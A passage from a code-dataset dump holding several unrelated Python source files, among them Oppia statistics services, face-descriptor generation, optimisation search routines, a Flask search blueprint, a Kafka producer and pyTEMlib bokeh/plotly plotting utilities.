exploration.state_ids:\n state = exploration.get_state_by_id(state_id)\n result[state.id] = {\n 'name': state.name,\n 'rules': {}\n }\n for handler in state.widget.handlers:\n for rule in handler.rules:\n rule_name = create_rule_name(rule)\n event_id = get_event_id(\n event_name, '.'.join(\n [exploration_id, state.id, rule_name]))\n\n journal = Journal.get(event_id, strict=False)\n result[state.id]['rules'][rule_name] = {\n 'answers': collections.Counter(\n journal.values).most_common(10) if journal else [],\n }\n\n return result\n\n if event_name == STATS_ENUMS.state_hit:\n result = {}\n\n exploration = Exploration.get(exploration_id)\n for state_id in exploration.state_ids:\n state = exploration.get_state_by_id(state_id)\n event_id = get_event_id(\n event_name, '.'.join([exploration_id, state.id]))\n\n result[state.id] = {\n 'name': state.name,\n 'count': Counter.get_value_by_id(event_id),\n }\n return result\n\n\ndef get_top_ten_improvable_states(explorations):\n ranked_states = []\n for exploration in explorations:\n for state_id in exploration.state_ids:\n state = exploration.get_state_by_id(state_id)\n state_key = '%s.%s' % (exploration.id, state.id)\n\n # Get count of how many times the state was hit\n event_id = get_event_id(STATS_ENUMS.state_hit, state_key)\n all_count = Counter.get_value_by_id(event_id)\n if all_count == 0:\n continue\n\n # Count the number of times the default rule was hit.\n event_id = get_event_id(\n STATS_ENUMS.rule_hit, '%s.Default' % state_key)\n default_count = Journal.get_value_count_by_id(event_id)\n journal = Journal.get(event_id, strict=False)\n top_default_answers = collections.Counter(\n journal.values).most_common(5) if journal else []\n\n # Count the number of times an answer was submitted, regardless\n # of which rule it hits.\n completed_count = 0\n for handler in state.widget.handlers:\n for rule in handler.rules:\n rule_name = create_rule_name(rule)\n event_id = get_event_id(\n STATS_ENUMS.rule_hit, '%s.%s' %\n (state_key, rule_name))\n completed_count += Journal.get_value_count_by_id(\n event_id)\n\n incomplete_count = all_count - completed_count\n\n state_rank, improve_type = 0, ''\n\n eligible_flags = []\n default_rule = filter(lambda rule: rule.name == 'Default',\n state.widget.handlers[0].rules)[0]\n default_self_loop = default_rule.dest == state.id\n if float(default_count) / all_count > .2 and default_self_loop:\n eligible_flags.append({\n 'rank': default_count,\n 'improve_type': IMPROVE_TYPE_DEFAULT})\n if float(incomplete_count) / all_count > .2:\n eligible_flags.append({\n 'rank': incomplete_count,\n 'improve_type': IMPROVE_TYPE_INCOMPLETE})\n\n eligible_flags = sorted(\n eligible_flags, key=lambda flag: flag['rank'], reverse=True)\n if eligible_flags:\n state_rank = eligible_flags[0]['rank']\n improve_type = eligible_flags[0]['improve_type']\n\n ranked_states.append({\n 'exp_id': exploration.id,\n 'exp_name': exploration.title,\n 'state_id': state.id,\n 'state_name': state.name,\n 'rank': state_rank,\n 'type': improve_type,\n 'top_default_answers': top_default_answers\n })\n\n problem_states = sorted(\n [state for state in ranked_states if state['rank'] != 0],\n key=lambda state: state['rank'],\n reverse=True)\n return problem_states[:10]\n","sub_path":"oppia/apps/statistics/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":9333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"60237672","text":"class Employee:\n def __init__(self,name,age):\n self.n=name\n self.a=age\n def printv(self):\n print(\"name\",self.n)\n print('age',self.a)\nf=open(\"student\",'r')\nfor l in f:\n data=l.split(\",\")\n name=data[0]\n age=data[1]\n ob=Employee(name,age)\n ob.printv()","sub_path":"Advanced_python/work1.py","file_name":"work1.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10890565","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 15 14:36:43 2014\n\n@author: joseph\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 12 12:35:04 2014\nThis file will used predefined 'coordinate' to select set of positions in a image\nthen pass them through parameters a and b to generate binary descriptor\n@author: joseph\n\"\"\"\nname = 'joseph'\nfrom numpy import *\nfrom skimage import io, color, filter\nimport skimage\nimport numpy as np\nimport pylab as pl\n\n\ndef BinDescriptor(image, coord, a, b):\n numRow = image.shape[0]\n numCol = image.shape[1]\n binaIm = zeros([numRow, numCol])\n X = zeros((coord.shape[0]))\n \n for i in range(coord.shape[0]):\n x = coord[i,0]\n y = coord[i,1]\n if (x - a < 0)|(x + a > numRow-1 )|(y - b < 0)|(y + b > numCol-1)|(x + a < 0)|(x - a > numRow-1 )|(y + b < 0)|(y - b > numCol-1): # in case b < \n continue;\n if (image[int(x-a), int(y-b)] - image[int(x+a), int(y+b)] > 0):\n binaIm[x,y] = 1\n X[i] = 1\n \n #pl.imshow(binaIm, cmap = 'gray')\n return X\n\n'''\nData Generating implemetation:\nNote: Quite similar to MakeData.m located in .../Research project/Data/New folder/\n'''\n\nnumImage = 1; # number of images will be chosen as training file\nnumSampleEachRegion = 200; \nn = numSampleEachRegion*5*numImage; # total number of samples in training set\nnumBinDescriptor = 992; # corresponds to 2^10 - 1 Node -> D = 11 \nSetofImageCanBeUsed = np.array([0,9,10,11, 12, 16, 18, 23, 26,27, 30, 32, 35, 36, 38,\\\n 39, 40, 41, 43, 46, 48, 49, 50, 53, 57,64, 66, 67, \\\n 68, 69, 70, 71, 72, 73, 74, 75, 76, 78, 80, 81, 82,\\\n 84, 86, 87, 88, 90, 94, 95, 96, 97, 100, 101, 102],\\\n dtype = int) # 0: used to shift the index by 1\n\n\n# Initializing outputs\ndata = zeros((n, numBinDescriptor));\nlabels = zeros((n));\nA = zeros((numBinDescriptor, 1));\nB = zeros((numBinDescriptor, 1));\n\nt= 0;\n# Create vector A and B parameters\nfor u in np.array(range(32))+1: # u and v control the ranges of values of A and B \n for v in np.array(range(32))+1:\n if (u-17) == 0 & (v-17) == 0:\n continue;\n A[t] = u - 17; \n B[t] = v - 17; \n t = t + 1;\n # end of loop v\n# end of loop u\n\nfor i in np.array(range(numImage)):\n # Load image from file\n m = 90; # choose images that are different from those chosen in training phase\n pathData = '/host/Research Project/Data/Rdata' + str(m) + '.jpg';\n image = io.imread(pathData)\n image = color.rgb2gray(image)\n image2 = skimage.img_as_ubyte(image)\n\n coordinate = np.genfromtxt('/home/'+name+'/Dropbox/FaceRegion/coordinate'+ str(m) +'.csv', dtype = int, delimiter = ',')\n labels[(i*coordinate.shape[0]):((i+1)*coordinate.shape[0])] = coordinate[:,-1];\n X = zeros((coordinate.shape[0], numBinDescriptor)); # The training info from 1 image\n \n # change coordinate (x,y) - > (y,x)\n coord = zeros((coordinate.shape[0],coordinate.shape[1]))\n coord[:,0] = coordinate[:,1] \n coord[:,1] = coordinate[:,0]\n \n for j in np.array(range(numBinDescriptor)):\n # Define parapemeter a, b\n a = A[j];\n b = B[j];\n \n # Apply Gaussian low pass filter to reduce noise\n image = filter.gaussian_filter(image, sigma = 0.8)\n \n # Make binary descritor from the relative positions between chosen\n # points and others in image\n XTemp = BinDescriptor(image, coord, a, b);\n X[:,j] = XTemp;\n # end of loop j \n data[(i*X.shape[0]):((i+1)*(X.shape[0])), :] = X;\n# end of loop i\n \ntrainingSet = column_stack((data, labels))\ntrainingSet = np.array(trainingSet, dtype = uint8)\n\n# Write the 'trainingSet.mat' to .csv file\nnp.savetxt('TestSetFace'+ str(m) +'.csv', trainingSet , fmt='%.2f', delimiter=',')\n","sub_path":"FaceRegion/DataGenFace_test (Acer's conflicted copy 2014-03-27).py","file_name":"DataGenFace_test (Acer's conflicted copy 2014-03-27).py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"163934287","text":"from Vector import *\nfrom math import *\nfrom random import random\nfrom time import clock\n\nSMALLEST_TRIANGLE_SIZE = 0.001\nMAX_RUN_TIME = 0.1\nDOMAIN_LIMIT = 10\nHILL_CLIMBING_RADIUS = 0.01\nNUMBER_OF_GRID_POINTS = 100\nMAX_TRIANGLE_COUNT = 50\n\nTRIANGLE_COUNT = 0\nPROBE_COUNT1 = 0\nPROBE_COUNT2 = 0\nPROBE_COUNT3 = 0\n\nX = Vector(0,0)\n\ndef nextTriangle(A,B,C):\n [B,C,A] = Vector.sort([A,B,C])\n D = B + C - A\n E = 3*(B+C)/2 - 2*A\n F = (3*(B+C) - 2*A)/4\n G = (2*A + B + C)/4\n H = (A+B)/2\n I = (B+C)/2\n for x in range(0, 2):\n if(A.cost()>G.cost()):\n A.equals(G)\n if(A.cost()>F.cost()):\n A.equals(F)\n if(A.cost()>E.cost()):\n A.equals(E)\n if(A.cost()>D.cost()):\n A.equals(D)\n return A,B,C \n\ndef NelderMeadSearch():\n A= randomVector()\n B= randomVector()\n C= randomVector()\n count = 0\n while((count <= MAX_TRIANGLE_COUNT) and A.dist(C)>= SMALLEST_TRIANGLE_SIZE and B.dist(A) >= SMALLEST_TRIANGLE_SIZE <= C.dist(B)):\n count+=1\n global TRIANGLE_COUNT\n TRIANGLE_COUNT+=1\n A,B,C = nextTriangle(A,B,C)\n return B\n\ndef runNelderMeadSearch():\n initial = clock()\n c = NelderMeadSearch()\n minc = c.cost()\n while(clock()-initial < MAX_RUN_TIME):\n cost = NelderMeadSearch().cost()\n if cost < minc:\n minc = cost\n print('1. Nelder-Mead Search used', TRIANGLE_COUNT, 'random triangles.')\n print('Vector = ', c, 'Cost = ', round(minc,5))\n print('---Search time =', round(clock() - initial, 2), 'seconds\\n')\n\ndef runRandomSearch():\n startTime = clock()\n vector = Vector(random()*DOMAIN_LIMIT,random()*DOMAIN_LIMIT)\n minc= vector.cost()\n while(clock() - startTime < MAX_RUN_TIME):\n global PROBE_COUNT1\n PROBE_COUNT1+=1\n vector = Vector(random()*DOMAIN_LIMIT,random()*DOMAIN_LIMIT)\n if(vector.cost() < minc):\n minc = vector.cost()\n print('2. Random Probing used', PROBE_COUNT1, 'probes.')\n print('Vector =', vector, 'Cost =', round(minc,5))\n print('---Search time =', round(clock() - startTime, 2), 'seconds\\n')\n \ndef frange(start, stop, step):\n i = start\n while(i < stop):\n yield i\n i += step\n\n\ndef runHillClimbingRandomResetSearch():\n initial = clock()\n minc = runSteps(random()*DOMAIN_LIMIT,random()*DOMAIN_LIMIT)\n while( clock()-initial < MAX_RUN_TIME):\n cost = runSteps(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT)\n if cost < minc:\n minc = cost \n print('3. Hill Climbing (Random Reset) used', PROBE_COUNT2, 'probes.')\n print('Vector =', X, 'Cost =', round(minc,5))\n print('---Search time =', round(clock() - initial, 2), 'seconds\\n')\n\ndef runSteps(p1,p2):\n vector1 = (Vector(p1, p2))\n cost1 = vector1.cost()\n vector2 = (Vector(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT))\n cost2 = vector2.cost()\n while cost1 < cost2:\n global PROBE_COUNT2\n PROBE_COUNT2+=1\n cost2 = cost1\n global X\n X = step(p1,p2)\n cost1 = X.cost()\n return cost1\n \ndef randomVector():\n return Vector(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT)\n \ndef step(p1,p2):#radius=1\n X1 = Vector(p1,p2)\n for t in frange(0, pi*2, pi/4):\n X = Vector(p1 + (cos(t)), p2 + (sin(t)))\n if X.cost() < X1.cost():\n X1.equals(X)\n return X1\n\ndef runHillClimbingGridSearch():\n initial = clock()\n vector3 = (Vector(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT))\n minCost = vector3.cost()\n while((clock()-initial < MAX_RUN_TIME)):\n for x in range(1, DOMAIN_LIMIT):\n for y in range(1, DOMAIN_LIMIT):\n global PROBE_COUNT3\n PROBE_COUNT3+=1\n cost = step(random()*x, random()*y).cost()\n if cost < minCost:\n minCost = cost\n print('4. Hill Climbing (Grid) used', PROBE_COUNT3, 'probes.')\n print('Vector =', vector3, 'Cost =', round(minCost,5))\n print('---Search time =', round(clock() - initial, 2), 'seconds\\n')\n\ndef main():\n print('SEARCH RESULTS:')\n runNelderMeadSearch()\n runRandomSearch()\n runHillClimbingRandomResetSearch()\n runHillClimbingGridSearch()\n\nif __name__ == '__main__': main()\n","sub_path":"NelderMead.py","file_name":"NelderMead.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162786185","text":"from flask import Blueprint, request, g, render_template, flash\nfrom flask.ext.solrquery import solr, signals as solr_signals #@UnresovledImport\n\n#from flask.ext.login import current_user #@UnresolvedImport\nfrom .forms import QueryForm\nfrom adsabs.core.solr import QueryBuilderSearch\nfrom adsabs.core.data_formatter import field_to_json\nfrom config import config\nfrom adsabs.core.logevent import LogEvent\nimport logging\n\n#Definition of the blueprint\nsearch_blueprint = Blueprint('search', __name__, template_folder=\"templates\", \n static_folder=\"static\", url_prefix='/search')\n\n__all__ = ['search_blueprint','search', 'search_advanced']\n\n@search_blueprint.after_request\ndef add_caching_header(response):\n \"\"\"\n Adds caching headers\n \"\"\"\n if not config.DEBUG:\n cache_header = 'max-age=3600, must-revalidate'\n else:\n cache_header = 'no-cache'\n response.headers.setdefault('Cache-Control', cache_header) \n return response\n\n@search_blueprint.before_request\ndef register_formatting_funcs():\n g.formatter_funcs = {'field_to_json': field_to_json}\n\n@search_blueprint.route('/', methods=('GET', 'POST'))\ndef search():\n \"\"\"\n returns the results of a search\n \"\"\"\n if not len(request.values):\n form = QueryForm(csrf_enabled=False)\n # prefill the database select menu option\n form.db_f.default = config.SEARCH_DEFAULT_DATABASE\n else:\n form = QueryForm.init_with_defaults(request.values)\n if form.validate():\n query_components = QueryBuilderSearch.build(form, request.values)\n resp = solr.query(**query_components)\n if resp.is_error():\n flash(resp.get_error_message(), 'error')\n return render_template('search_results.html', resp=resp, form=form)\n else:\n for field_name, errors_list in form.errors.iteritems():\n flash('errors in the form validation: %s.' % '; '.join(errors_list), 'error')\n return render_template('search.html', form=form)\n\n@search_blueprint.route('/facets', methods=('GET', 'POST'))\ndef facets():\n \"\"\"\n returns facet sets for a search query\n \"\"\"\n form = QueryForm.init_with_defaults(request.values)\n if form.validate():\n query_components = QueryBuilderSearch.build(form, request.values, facets_components=True)\n resp = solr.query(**query_components)\n return render_template('facets_sublevel.html', resp=resp, facet_field_interf_id=query_components['facet_field_interf_id'] )\n\n# if query_components.get('facet_fields') and query_components.get('facet_field_interf_id'):\n# resp = solr.facet_query(query_components['q'], \n# facet_fields=query_components['facet_fields'],\n# filters=query_components['filters'],\n# ui_filters=query_components['ui_filters'],\n# ui_q=query_components['ui_q'],\n# query_fields=query_components['query_fields']\n# )\n# return render_template('facets_sublevel.html', resp=resp, facet_field_interf_id=query_components['facet_field_interf_id'] )\n# else:\n# return 'facet query parameters error'\n \n \n@search_blueprint.route('/advanced/', methods=('GET', 'POST'))\ndef search_advanced():\n \"\"\"\n \"\"\"\n pass\n\n@solr_signals.error_signal.connect\ndef log_solr_error(sender, **kwargs):\n if hasattr(g, 'user_cookie_id'):\n kwargs['user_cookie_id'] = g.user_cookie_id\n event = LogEvent.new(request.url, **kwargs)\n logging.getLogger('search').info(event) \n \n@solr_signals.search_signal.connect\ndef log_solr_search(sender, **kwargs):\n \"\"\"\n extracts some data from the solr for log/analytics purposes\n \"\"\"\n if hasattr(g, 'user_cookie_id'):\n resp = kwargs.pop('response')\n log_data = {\n 'q': resp.get_query(),\n 'hits': resp.get_hits(),\n 'count': resp.get_count(),\n 'start': resp.get_start_count(),\n 'qtime': resp.get_qtime(),\n 'results': resp.get_doc_values('bibcode', 0, config.SEARCH_DEFAULT_ROWS),\n 'error_msg': resp.get_error_message(),\n 'http_status': resp.get_http_status(),\n 'solr_url': resp.request.url,\n 'user_cookie_id': g.user_cookie_id\n }\n log_data.update(kwargs)\n event = LogEvent.new(request.url, **log_data)\n logging.getLogger('search').info(event) \n","sub_path":"adsabs/modules/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336080418","text":"import numpy as np\nfrom PIL import ImageGrab\nimport cv2\nimport time\nfrom conm import *\n\ndef process_img(image):\n original_image = image\n # convert to gray\n processed_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # edge detection\n processed_img = cv2.Canny(processed_img, threshold1 = 200, threshold2=300)\n return processed_img\n\n\n\ndef screen_record(a, b, c, d):\n last_time = time.time()\n while(True):\n printscreen = np.array(ImageGrab.grab(bbox=(a,b,c,d+50)))\n #print(printscreen.shape)\n print('loop took {} seconds'.format(time.time()-last_time))\n last_time = time.time()\n #ret = conm(printscreen, 1)\n ret = conm(printscreen, 1)\n shape = ret.shape\n inx = int(shape[0]/4)\n iny = int(shape[1]/4)\n ret = cv2.resize(ret, (iny, inx))\n cv2.imshow('window',ret)\n #cv2.imshow('window',cv2.cvtColor(printscreen, cv2.COLOR_BGR2RGB))\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n return ret\n\n#screen_record()\n","sub_path":"zhaoyi Li project/Zhaoyi Li project/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"100595273","text":"import re\ndef american_date_to_europian_date():\n month={\"January\":\"1\",\"February\":\"2\",\"March\":\"3\",\"April\":\"4\",\"May\":\"5\",\"June\":\"6\",\"July\":\"7\",\"August\":\"8\",\"September\":\"9\",\"October\":\"10\",\"November\":\"11\",\"December\":\"12\"}\n\n date = str(input())\n d = re.split(', | |/|,',date)\n #print(d)\n # print(date)\n\n #date= date.split('/')\n if d[0].isalpha():\n mm = month[d[0]]\n #print('{0}/{1}/{2}'.format(d[1], mm, d[2]))\n else:\n mm = d[0]\n eudate = '{0}/{1}/{2}'.format(d[1], mm, d[2]) \n print(eudate) \n\namerican_date_to_europian_date() ","sub_path":"python/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200675857","text":"from json import dumps\nfrom random import random, randint\n\nfrom kafka import KafkaProducer\n\nif __name__ == \"__main__\":\n # Create a producer connecting to a kafka broker\n producer = KafkaProducer(bootstrap_servers=['localhost:9092'],\n value_serializer=lambda x: dumps(x).encode('utf-8'))\n\n # Choose a random identity\n random_id = randint(0, 6)\n\n # Create some random data\n data = {\"sensorData1\": random(), \"sensorData2\": random(), \"id\": random_id}\n\n # Send the message\n message = producer.send('sensor-data-partitioned', value=data,\n key=str(random_id).encode())\n\n # Wait for it to be sent\n message.get()\n","sub_path":"02_consumer/python_producer.py","file_name":"python_producer.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"376705998","text":"# read txt in content\n# lowercase, ignore punctuation, split sentence in word and return list of words\nimport re\ndef read_data():\n fh = open(\"ScientificAmerican.txt\",\"r\",encoding=\"utf8\")\n content = fh.read()\n content = content.lower()\n content = re.sub(r'[^a-z\\']+',' ', content)\n return content.split()\n\n\n\n# us counter to count the frequency of lengths of words\n# order result by key and return it\nimport collections as cl\ndef process_data(list_of_words):\n result = cl.Counter(len(word.strip(' ')) for word in list_of_words)\n result = cl.OrderedDict(sorted(result.items()))\n result = dict(result)\n return result\n\n\n\n# print hist by dict\ndef print_count_histogram(data):\n str_hist =\"\"\n for item in data.items():\n str_hist = str_hist + str(item[0]) + \":\" + \"*\"*item[1] + \"\\n\"\n print(str_hist)\n\nprint_count_histogram(process_data(read_data()))","sub_path":"A10_25105515.py","file_name":"A10_25105515.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"450218377","text":"\"\"\"plotting of sidpy Datasets with bokeh for google colab\"\"\"\n\nimport numpy as np\nimport sidpy\nfrom sidpy.hdf.dtype_utils import is_complex_dtype\n\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom ipywidgets import widgets\n\n\nimport pyTEMlib.eels_tools as eels\nimport pyTEMlib.file_tools as ft\n\n\nfrom bokeh.layouts import column\nfrom bokeh.plotting import figure # , show, output_notebook\nfrom bokeh.models import CustomJS, Slider, Span\nfrom bokeh.models import LinearColorMapper, ColorBar, ColumnDataSource, BoxSelectTool\nfrom bokeh.palettes import Spectral11\n\nfrom pyTEMlib.sidpy_tools import *\nimport sys\nimport matplotlib.pyplot as plt\n# from matplotlib.widgets import Slider, Button\nimport matplotlib.patches as patches\n# import matplotlib.animation as animation\n\nif sys.version_info.major == 3:\n unicode = str\n\ndefault_cmap = plt.cm.viridis\n\n\ndef plot(dataset, palette='Viridis256'):\n \"\"\"plot according to data_type\"\"\"\n if dataset.data_type.name == 'IMAGE_STACK':\n p = plot_stack(dataset, palette=palette)\n elif dataset.data_type.name == 'IMAGE':\n p = plot_image(dataset, palette=palette)\n elif dataset.data_type.name == 'SPECTRUM':\n p = plot_spectrum(dataset, palette=palette)\n else:\n p = None\n return p\n\n\ndef plot_stack(dataset, palette=\"Viridis256\"):\n \"\"\"Plotting a stack of images\n\n Plotting a stack of images contained in a sidpy.Dataset.\n The images can be scrolled through with a slider widget.\n\n Parameters\n ----------\n dataset: sidpy.Dataset\n sidpy dataset with data_type 'IMAGE_STACK'\n palette: bokeh palette\n palette is optional\n\n Returns\n -------\n p: bokeh plot\n\n Example\n -------\n >> import pyTEMlib\n >> from bokeh.plotting import figure, show, output_notebook\n >> output_notebook()\n >> p = pyTEMlib.viz(dataset)\n >> p.show(p)\n \"\"\"\n\n if not isinstance(dataset, sidpy.Dataset):\n raise TypeError('Need a sidpy dataset for plotting')\n if dataset.data_type.name != 'IMAGE_STACK':\n raise TypeError('Need an IMAGE_STACK for plotting a stack')\n\n stack = np.array(dataset-dataset.min())\n stack = stack/stack.max()*256\n stack = np.array(stack, dtype=int)\n\n color_mapper = LinearColorMapper(palette=palette, low=0, high=256)\n\n p = figure(match_aspect=True, plot_width=600, plot_height=600)\n im_plot = p.image(image=[stack[0]], x=[0], y=[0], dw=[dataset.x[-1]], dh=[dataset.y[-1]], color_mapper=color_mapper)\n p.x_range.range_padding = 0\n p.y_range.range_padding = 0\n p.xaxis.axis_label = 'distance (nm)'\n p.yaxis.axis_label = 'distance (nm)'\n\n slider = Slider(start=0, end=stack.shape[0]-1, value=0, step=1, title=\"frame\")\n\n update_curve = CustomJS(args=dict(source=im_plot, slider=slider, stack=stack),\n code=\"\"\"var f = slider.value;\n source.data_source.data['image'] = [stack[f]];\n // necessary because we mutated source.data in-place\n source.data_source.change.emit(); \"\"\")\n slider.js_on_change('value', update_curve)\n\n return column(slider, p)\n\n\ndef plot_image(dataset, palette=\"Viridis256\"):\n \"\"\"Plotting an image\n\n Plotting an image contained in a sidpy.Dataset.\n\n Parameters\n ----------\n dataset: sidpy.Dataset\n sidpy dataset with data_type 'IMAGE_STACK'\n palette: bokeh palette\n palette is optional\n\n Returns\n -------\n p: bokeh plot\n\n Example\n -------\n >> import pyTEMlib\n >> from bokeh.plotting import figure, show, output_notebook\n >> output_notebook()\n >> p = pyTEMlib.viz(dataset)\n >> p.show(p)\n\n\n \"\"\"\n if not isinstance(dataset, sidpy.Dataset):\n raise TypeError('Need a sidpy dataset for plotting')\n\n if dataset.data_type.name not in ['IMAGE', 'IMAGE_STACK']:\n raise TypeError('Need an IMAGE or IMAGE_STACK for plotting an image')\n\n if dataset.data_type.name == 'IMAGE_STACK':\n image = dataset.sum(axis=0)\n image = sidpy.Dataset.from_array(image)\n image.data_type = 'image'\n image.title = dataset.title\n image.set_dimension(0, dataset.dim_1)\n image.set_dimension(1, dataset.dim_2)\n else:\n image = dataset\n\n p = figure(tooltips=[(\"x\", \"$x\"), (\"y\", \"$y\"), (\"value\", \"@image\")], match_aspect=True,\n plot_width=675, plot_height=600, )\n color_mapper = LinearColorMapper(palette=palette, low=float(image.min()), high=float(image.max()))\n\n # must give a vector of image data for image parameter\n p.image(image=[np.array(image)], x=0, y=0, dw=image.x[-1], dh=image.y[-1], color_mapper=color_mapper,\n level=\"image\")\n p.x_range.range_padding = 0\n p.y_range.range_padding = 0\n\n p.grid.grid_line_width = 0.\n p.xaxis.axis_label = 'distance (nm)'\n p.yaxis.axis_label = 'distance (nm)'\n\n color_bar = ColorBar(color_mapper=color_mapper, major_label_text_font_size=\"7pt\",\n label_standoff=6, border_line_color=None, location=(0, 0))\n p.add_layout(color_bar, 'right')\n return p\n\n\ndef plot_spectrum(dataset, selected_range, palette=Spectral11):\n \"\"\"Plot spectrum\"\"\"\n if not isinstance(dataset, sidpy.Dataset):\n raise TypeError('Need a sidpy dataset for plotting')\n\n if dataset.data_type.name not in ['SPECTRUM']:\n raise TypeError('Need an sidpy.Dataset of data_type SPECTRUM for plotting a spectrum ')\n\n p = figure(x_axis_type=\"linear\", plot_width=800, plot_height=400,\n tooltips=[(\"index\", \"$index\"), (\"(x,y)\", \"($x, $y)\")],\n tools=\"pan,wheel_zoom,box_zoom,reset, hover, lasso_select\")\n p.add_tools(BoxSelectTool(dimensions=\"width\"))\n\n # first line is dataset\n spectrum = ColumnDataSource(data=dict(x=dataset.dim_0, y=np.array(dataset)))\n p.scatter('x', 'y', color='blue', size=1, alpha=0., source=spectrum,\n selection_color=\"firebrick\", selection_alpha=0.)\n p.line(x='x', y='y', source=spectrum, legend_label=dataset.title, color=palette[0], line_width=2)\n # add other lines if available\n if 'add2plot' in dataset.metadata:\n data = dataset.metadata['add2plot']\n for key, line in data.items():\n p.line(dataset.dim_0.values, line['data'], legend_label=line['legend'], color=palette[key], line_width=2)\n p.legend.click_policy = \"hide\"\n p.xaxis.axis_label = dataset.labels[0]\n p.yaxis.axis_label = dataset.data_descriptor\n p.title.text = dataset.title\n\n my_span = Span(location=0, dimension='width', line_color='gray', line_width=1)\n p.add_layout(my_span)\n\n callback = CustomJS(args=dict(s1=spectrum), code=\"\"\"\n var inds = s1.selected.indices;\n if (inds.length == 0)\n return;\n var kernel = IPython.notebook.kernel;\n kernel.execute(\"selected_range = \" + [inds[0], inds[inds.length-1]]);\"\"\")\n\n spectrum.selected.js_on_change('indices', callback)\n return p\n\n\nclass CurveVisualizer(object):\n \"\"\"Plots a sidpy.Dataset with spectral dimension\n\n \"\"\"\n def __init__(self, dset, spectrum_number=None, axis=None, leg=None, **kwargs):\n if not isinstance(dset, sidpy.Dataset):\n raise TypeError('dset should be a sidpy.Dataset object')\n if axis is None:\n self.fig = plt.figure()\n self.axis = self.fig.add_subplot(1, 1, 1)\n else:\n self.axis = axis\n self.fig = axis.figure\n\n self.dset = dset\n self.selection = []\n [self.spec_dim, self.energy_scale] = get_dimensions_by_type('spectral', self.dset)[0]\n\n self.lined = dict()\n self.plot(**kwargs)\n\n def plot(self, **kwargs):\n line1, = self.axis.plot(self.energy_scale.values, self.dset, label='spectrum', **kwargs)\n lines = [line1]\n if 'add2plot' in self.dset.metadata:\n data = self.dset.metadata['add2plot']\n for key, line in data.items():\n line_add, = self.axis.plot(self.energy_scale.values, line['data'], label=line['legend'])\n lines.append(line_add)\n\n legend = self.axis.legend(loc='upper right', fancybox=True, shadow=True)\n legend.get_frame().set_alpha(0.4)\n\n for legline, origline in zip(legend.get_lines(), lines):\n legline.set_picker(True)\n legline.set_pickradius(5) # 5 pts tolerance\n self.lined[legline] = origline\n self.fig.canvas.mpl_connect('pick_event', self.onpick)\n\n self.axis.axhline(0, color='gray', alpha=0.6)\n self.axis.set_xlabel(self.dset.labels[0])\n self.axis.set_ylabel(self.dset.data_descriptor)\n self.axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n self.fig.canvas.draw_idle()\n\n def update(self, **kwargs):\n x_limit = self.axis.get_xlim()\n y_limit = self.axis.get_ylim()\n self.axis.clear()\n self.plot(**kwargs)\n self.axis.set_xlim(x_limit)\n self.axis.set_ylim(y_limit)\n\n def onpick(self, event):\n # on the pick event, find the orig line corresponding to the\n # legend proxy line, and toggle the visibility\n legline = event.artist\n origline = self.lined[legline]\n vis = not origline.get_visible()\n origline.set_visible(vis)\n # Change the alpha on the line in the legend so we can see what lines\n # have been toggled\n if vis:\n legline.set_alpha(1.0)\n else:\n legline.set_alpha(0.2)\n self.fig.canvas.draw()\n\n \ndef verify_spectrum_dataset(datasets):\n if isinstance(datasets, sidpy.Dataset):\n datasets = {'Channel_000': datasets}\n \n first_dataset = datasets[list(datasets)[0]]\n has_complex_dataset = False\n for dat in datasets.values():\n if is_complex_dtype(dat.dtype):\n has_complex_dataset = True\n \n \n if first_dataset.data_type.name != 'SPECTRUM':\n raise TypeError('We need a spectrum dataset here')\n if first_dataset.ndim >1:\n if first_dataset.shape[1] >1:\n raise TypeError('Wrong dimensions for spectrum datasset')\n \n energy_dim = first_dataset.get_spectrum_dims()\n energy_dim = first_dataset.get_dimension_by_number(energy_dim[0])[0]\n energy_dim.label = f'{energy_dim.quantity} ({energy_dim.units})'\n \n default_plot_dictionary = {'title': '',\n 'theme': \"plotly_white\",\n 'y_scale': 1.0,\n 'y_axis_label': first_dataset.data_descriptor,\n 'x_axis_label': energy_dim.label,\n 'show_legend': True,\n 'height': 500,\n 'figure_size': None,\n 'scale_bar': False,\n 'colorbar': True,\n 'set_title': True,\n 'has_complex_dataset': has_complex_dataset}\n \n \n default_plot_dictionary.update(first_dataset.metadata['plot_parameter'])\n first_dataset.metadata['plot_parameter'] = default_plot_dictionary\n \n return datasets\n\ndef spectrum_view_plotly(datasets, figure=None, show=False):\n \n datasets = verify_spectrum_dataset(datasets)\n first_dataset = datasets[list(datasets)[0]]\n plot_dic = first_dataset.metadata['plot_parameter']\n \n if figure is None:\n if plot_dic['has_complex_dataset']:\n fig = make_subplots(rows=1, cols=2, 